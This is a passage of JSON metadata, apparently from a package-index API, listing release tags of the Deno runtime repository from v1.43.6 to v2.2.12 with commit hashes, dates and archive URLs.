d.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.